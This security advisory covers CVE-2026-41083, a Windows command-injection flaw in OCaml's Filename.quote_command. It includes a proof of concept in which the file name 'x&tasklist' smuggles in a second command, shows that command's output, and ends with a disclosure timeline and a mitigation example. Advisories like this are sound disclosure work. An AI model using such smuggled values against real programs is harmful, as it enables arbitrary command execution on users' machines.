PT-2026-50717 · Git · OCaml
Published 2026-04-18 · Updated 2026-06-18 · CVE-2026-41083
CVSS v3.1: 6.1 (Medium)
Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
The quoting of stdin/stdout/stderr (using Filename.quote_command) on Windows is not sufficient, and allows the & character to be passed through. This allows an attacker to inject a shell command if they can specify the stdin/stdout/stderr of a program to be executed.
Exploit
```
$ opam exec -- ocaml
OCaml version 4.14.2
Enter #help;; for help.
# let outfile = "x&tasklist" in
let cmd = Filename.quote_command "netsh.exe" ~stdout:outfile ["help"] in
ignore (Sys.command cmd)
;;
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 8 K
System 4 Services 0 168 K
Secure System 236 Services 0 191,468 K
Registry 276 Services 0 3,428 K
smss.exe 608 Services 0 1,676 K
csrss.exe 984 Services 0 5,928 K
```
Timeline
- 2026-06-18 release of this security advisory
- 2026-06-15 release of OCaml 4.14.4
- 2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853
- 2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org
Fix
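The timeline above lists the upstream fix (pull request 14853) and the OCaml 4.14.4 release. For code that still has to run on an affected version, the sketch below is an added example, not taken from the advisory or from the OCaml project: it redirects stdout by file descriptor with Unix.create_process instead of building a cmd.exe command line, so the file name is never parsed as shell syntax. The helper name run_stdout_to_file is hypothetical, and the program and file name are the ones from the reproduction above; stdin and stderr can be redirected the same way.

```ocaml
(* Added example: run a program with stdout redirected to a file without
   going through cmd.exe. Requires the unix library
   (e.g. ocamlfind ocamlopt -package unix -linkpkg ...). *)

(* Hypothetical helper name; not part of the OCaml standard library. *)
let run_stdout_to_file ~prog ~args ~outfile =
  (* The file is opened by the OCaml process itself, so a name such as
     "x&tasklist" is only a file name: no shell ever sees it. *)
  let out =
    Unix.openfile outfile [ Unix.O_WRONLY; Unix.O_CREAT; Unix.O_TRUNC ] 0o644
  in
  Fun.protect
    ~finally:(fun () -> Unix.close out)
    (fun () ->
      (* argv.(0) is the program name by convention; prog is looked up in
         PATH by Unix.create_process. *)
      let argv = Array.of_list (prog :: args) in
      (* The child inherits our stdin and stderr; only stdout is replaced. *)
      let pid = Unix.create_process prog argv Unix.stdin out Unix.stderr in
      match Unix.waitpid [] pid with
      | _, Unix.WEXITED code -> Ok code
      | _, Unix.WSIGNALED n | _, Unix.WSTOPPED n -> Error n)

let () =
  (* Same program and file name as the reproduction in this advisory. *)
  match
    run_stdout_to_file ~prog:"netsh.exe" ~args:[ "help" ]
      ~outfile:"x&tasklist"
  with
  | Ok code -> Printf.printf "netsh.exe exited with code %d\n" code
  | Error n -> Printf.printf "netsh.exe terminated abnormally (%d)\n" n
```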
Related Identifiers
Affected Products
OCaml